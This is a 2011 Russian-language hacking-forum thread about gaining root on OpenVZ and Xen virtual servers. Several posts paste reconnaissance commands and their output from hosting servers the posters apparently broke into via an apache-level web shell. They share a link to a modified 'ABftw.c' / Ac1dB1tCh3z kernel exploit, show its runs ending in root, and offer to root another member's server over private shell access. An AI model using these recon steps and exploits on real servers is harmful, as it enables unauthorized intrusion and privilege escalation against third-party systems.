Старый 30.11.2011, 22:27   #261
Kernet
 
Регистрация: 06.07.2010
Сообщений: 16
Репутация: 0
По умолчанию

Цитата:
Сообщение от Cuko Посмотреть сообщение
Извиняюсь, но, иной раз вы говорите "Виртуалка", тем не менее, я рутал виртуалки, даже те, на которые вы явно указывали что серв непохек.
Виртуалка по определению не может рутаться, там нету ядра
Kernet вне форума   Ответить с цитированием
Старый 30.11.2011, 23:29   #262
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Цитата:
Сообщение от Kernet Посмотреть сообщение
Виртуалка по определению не может рутаться, там нету ядра
мб все зависит от виртуализации? У меня на ВДС /boot пусто а на Виртуалбоксе ядра лежат в /boot лично собирал 3-ю ветку.
ЗЫ Рут можно и не через ядерные сплоенты получить
b3 вне форума   Ответить с цитированием
Старый 30.11.2011, 23:58   #263
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

Цитата:
Сообщение от Kernet Посмотреть сообщение
Виртуалка по определению не может рутаться, там нету ядра
вот это новости
col вне форума   Ответить с цитированием
Старый 01.12.2011, 00:04   #264
Cuko
 
Регистрация: 12.11.2010
Сообщений: 15
Репутация: 2
По умолчанию

Код:
Наглядный пример, рутал вчера:
$ uname -a ; cat /proc/version /etc/issue /proc/sys/vm/mmap_min_addr ; ls -la /lib/libc* /lib/libpc* /lib/libm* /usr/bin/pkexec /usr/bin/staprun --full-time ; which gcc ;pkexec --version  2>&1
Linux  2.6.18-028stab067.4 #1 SMP Thu Jan 1 18:06:11 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux
Linux version 2.6.18-028stab067.4 (root@rhel5-64-build) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Thu Jan 1 18:06:11 MSK 2010
CentOS release 5 (Final)
Kernel \r on an \m

4096
-rwxr-xr-x 1 root root 1589908 2007-12-01 02:39:33.000000000 +0300 /lib/libc-2.5.so
lrwxrwxrwx 1 root root      11 2008-02-22 10:35:20.000000000 +0300 /lib/libc.so.6 -> libc-2.5.so
-rwxr-xr-x 1 root root  191636 2011-09-01 22:06:48.000000000 +0400 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 2008-02-22 10:35:20.000000000 +0300 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2008-02-22 10:35:44.000000000 +0300 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    7748 2007-11-10 18:20:30.000000000 +0300 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   25992 2011-09-01 22:06:48.000000000 +0400 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root      15 2008-02-22 10:35:20.000000000 +0300 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1155044 2011-09-01 22:06:48.000000000 +0400 /lib/libcrypto.so.0.9.7a
-rwxr-xr-x 1 root root 1241936 2007-10-18 02:19:24.000000000 +0400 /lib/libcrypto.so.0.9.8b
lrwxrwxrwx 1 root root      19 2008-06-24 14:00:51.000000000 +0400 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root      19 2008-02-22 10:35:45.000000000 +0300 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8b
-rwxr-xr-x 1 root root  208352 2007-12-01 02:39:33.000000000 +0300 /lib/libm-2.5.so
lrwxrwxrwx 1 root root      11 2008-02-22 10:35:20.000000000 +0300 /lib/libm.so.6 -> libm-2.5.so
/usr/bin/gcc
sh: pkexec: command not found
$ ls -la /boot
total 2
drwxr-xr-x  2 root root 1024 Mar 29  2007 .
drwxr-xr-x 26 root root 1024 Oct 13 14:25 ..
$ df -h 2>&1
Filesystem            Size  Used Avail Use% Mounted on
/dev/vzfs             120G  116G  4.9G  96% /
none                  1.0G  4.0K  1.0G   1% /dev
tmpfs                 1.0G     0  1.0G   0% /usr/local/psa/handlers/before-local
tmpfs                 1.0G     0  1.0G   0% /usr/local/psa/handlers/before-queue
tmpfs                 1.0G     0  1.0G   0% /usr/local/psa/handlers/before-remote
tmpfs                 1.0G  7.5M 1017M   1% /usr/local/psa/handlers/info
tmpfs                 1.0G     0  1.0G   0% /usr/local/psa/handlers/spool
Как видно из вывода, это виртуалка, дебианоподобная ось, есть старый глибц, но так как дебиан* то непорутаеться, рутнул модификацией многоуважаемого SynQ!, сплоита ABftw.c.
Доказательства)):
Код:
$ uname -a ; /путь/до/суидника пароль 'id' 2>&1
Linux 2.6.18-028stab067.4 #1 SMP Thu Jan 1 18:06:11 MSK 2010 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=48(apache),2523(psaserv)
Cuko вне форума   Ответить с цитированием
Старый 01.12.2011, 02:28   #265
Andrey1800
 
Регистрация: 31.08.2010
Сообщений: 196
Репутация: 154
По умолчанию

Цитата:
Виртуалка по определению не может рутаться, там нету ядра
нет ядра - нет системы) в виртуализациях используется ядро хост системы. openvz рутается отлично ядерными эксплоитами, с xen хз, не попадались уязвимые.
Andrey1800 вне форума   Ответить с цитированием
Старый 01.12.2011, 04:10   #266
col
 
Регистрация: 17.03.2011
Сообщений: 180
Репутация: 8
По умолчанию

не знал что публичный abftw.c берет openvz
col вне форума   Ответить с цитированием
Старый 01.12.2011, 08:51   #267
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Цитата:
Сообщение от col Посмотреть сообщение
не знал что публичный abftw.c берет openvz
Я тоже
Не пробовал ни разу.

Cuko
Спасибо за сообщение, правда это не дебианоподобная ось (та, что в виртуалке, как и написано, - centos). Что на хосте неизвестно, да и неважно в данном случае.

PS Вообще ядра с stab в uname - это openvz виртуализация, особенность в том, что на все openvz виртуалки на сервере запущено только 1 общее ядро (оно же является ядром хост-системы, в которой и запущены виртуалки). Т.о. экономится память, не надо для каждой виртуалки держать в памяти свое ядро.
Xen в этом плане другой, там у каждой виртуалки свое ядро. Это так, маленький ликбез, чтобы в гугл не ходить
SynQ вне форума   Ответить с цитированием
Старый 01.12.2011, 13:58   #268
azid
 
Регистрация: 21.10.2010
Сообщений: 61
Репутация: 1
По умолчанию

Рутал xen через glibc ет ответ на пару постов выше
azid вне форума   Ответить с цитированием
Старый 03.12.2011, 13:57   #269
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Цитата:
Как видно из вывода, это виртуалка, дебианоподобная ось, есть старый глибц, но так как дебиан* то непорутаеться, рутнул модификацией многоуважаемого SynQ!, сплоита ABftw.c.
Доказательства)):
Это который?
А то у меня примерно тоже самое, только с обновленным глибц
Код:
$ uname -a ; cat /proc/version /etc/issue /proc/sys/vm/mmap_min_addr ; ls -la /lib/libc* /lib/libpc* /lib/libm* /usr/bin/pkexec /usr/bin/staprun --full-time ; which gcc ; pkexec --version 2>&1
Linux 2.6.18-028stab069.6 #1 SMP Wed May 26 18:10:06 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
Linux version 2.6.18-028stab069.6 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Wed May 26 18:10:06 MSD 2010
CentOS release 5.6 (Final)
Kernel \r on an \m

-rwxr-xr-x 1 root root 1693812 2011-04-27 01:30:30.000000000 +0400 /lib/libc-2.5.so
lrwxrwxrwx 1 root root      11 2011-06-09 14:49:29.000000000 +0400 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root      14 2011-06-09 11:20:32.000000000 +0400 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root   11560 2007-03-14 21:15:10.000000000 +0300 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root  191708 2011-04-27 01:30:30.000000000 +0400 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 2011-06-09 14:49:29.000000000 +0400 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2011-06-11 11:52:11.000000000 +0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    6300 2010-11-11 21:39:52.000000000 +0300 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   43616 2011-04-27 01:30:30.000000000 +0400 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root      15 2011-06-09 14:49:29.000000000 +0400 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1156324 2010-03-25 15:12:53.000000000 +0300 /lib/libcrypto.so.0.9.7a
-rwxr-xr-x 1 root root 1295456 2011-03-07 04:51:11.000000000 +0300 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      19 2011-06-11 11:52:37.000000000 +0400 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root      19 2011-06-10 21:59:34.000000000 +0400 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root  216544 2011-04-27 01:30:31.000000000 +0400 /lib/libm-2.5.so
lrwxrwxrwx 1 root root      11 2011-06-09 14:49:29.000000000 +0400 /lib/libm.so.6 -> libm-2.5.so
/usr/bin/gcc
sh: pkexec: command not found
Код:
$ ls -la /boot;df -h 2>&1
total 2
drwxr-xr-x  2 root root 1024 May 11  2011 .
drwxr-xr-x 23 root root 1024 Nov 23 11:13 ..
Filesystem            Size  Used Avail Use% Mounted on
/dev/vzfs             380G   95G  286G  25% /
none                  3.9G  4.0K  3.9G   1% /dev

если это он https://rdot.org/forum/showpost.php?p=21692&postcount=233
то вот выхлоп:
Цитата:
sh-3.2$ ./acid_static
!!! 3v3ryth3ng f41l3d!!*@&^@&*^@* try an0th3r 0d4y L0l
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ K3rn3l r3l3as3: 2.6.18-028stab069.6
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
!!! N0t a RH3l k3rn3l
!!! u4bl3 t0 f1nd t4rg3t!? W3'll s33 ab0ut th4t!
sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
dumb вне форума   Ответить с цитированием
Старый 03.12.2011, 14:57   #270
kfor
 
Аватар для kfor
 
Регистрация: 27.01.2011
Сообщений: 119
Репутация: 39
По умолчанию

Цитата:
Сообщение от dumb Посмотреть сообщение
Это который?
А то у меня примерно тоже самое, только с обновленным глибц
Код:
$ uname -a ; cat /proc/version /etc/issue /proc/sys/vm/mmap_min_addr ; ls -la /lib/libc* /lib/libpc* /lib/libm* /usr/bin/pkexec /usr/bin/staprun --full-time ; which gcc ; pkexec --version 2>&1
Linux 2.6.18-028stab069.6 #1 SMP Wed May 26 18:10:06 MSD 2010 x86_64 x86_64 x86_64 GNU/Linux
Linux version 2.6.18-028stab069.6 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Wed May 26 18:10:06 MSD 2010
CentOS release 5.6 (Final)
Kernel \r on an \m

-rwxr-xr-x 1 root root 1693812 2011-04-27 01:30:30.000000000 +0400 /lib/libc-2.5.so
lrwxrwxrwx 1 root root      11 2011-06-09 14:49:29.000000000 +0400 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root      14 2011-06-09 11:20:32.000000000 +0400 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root   11560 2007-03-14 21:15:10.000000000 +0300 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root  191708 2011-04-27 01:30:30.000000000 +0400 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 2011-06-09 14:49:29.000000000 +0400 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 2011-06-11 11:52:11.000000000 +0400 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    6300 2010-11-11 21:39:52.000000000 +0300 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   43616 2011-04-27 01:30:30.000000000 +0400 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root      15 2011-06-09 14:49:29.000000000 +0400 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1156324 2010-03-25 15:12:53.000000000 +0300 /lib/libcrypto.so.0.9.7a
-rwxr-xr-x 1 root root 1295456 2011-03-07 04:51:11.000000000 +0300 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      19 2011-06-11 11:52:37.000000000 +0400 /lib/libcrypto.so.4 -> libcrypto.so.0.9.7a
lrwxrwxrwx 1 root root      19 2011-06-10 21:59:34.000000000 +0400 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
-rwxr-xr-x 1 root root  216544 2011-04-27 01:30:31.000000000 +0400 /lib/libm-2.5.so
lrwxrwxrwx 1 root root      11 2011-06-09 14:49:29.000000000 +0400 /lib/libm.so.6 -> libm-2.5.so
/usr/bin/gcc
sh: pkexec: command not found
Код:
$ ls -la /boot;df -h 2>&1
total 2
drwxr-xr-x  2 root root 1024 May 11  2011 .
drwxr-xr-x 23 root root 1024 Nov 23 11:13 ..
Filesystem            Size  Used Avail Use% Mounted on
/dev/vzfs             380G   95G  286G  25% /
none                  3.9G  4.0K  3.9G   1% /dev

если это он https://rdot.org/forum/showpost.php?p=21692&postcount=233
то вот выхлоп:
Это кинь в приват шелл, думаю смогу рутнуть его.


---------------------------

Ну впринципе как я и думал. Символы спрятали, а ядро то не пропатчили

sh-3.2$ id
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
sh-3.2$ ./abs
!!! Everything failed
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kernel release: 2.6.18-028stab069.6
??? Trying the fops method
!!! Not a RHEL kernel
!!! Unable to find lsm target
sh-3.2$ ./abs -i

sh: no job control in this shell
sh-3.2# sh-3.2# id
uid=0(root) gid=48(apache) groups=48(apache),2523(psaserv)

Последний раз редактировалось kfor; 03.12.2011 в 15:22..
kfor вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot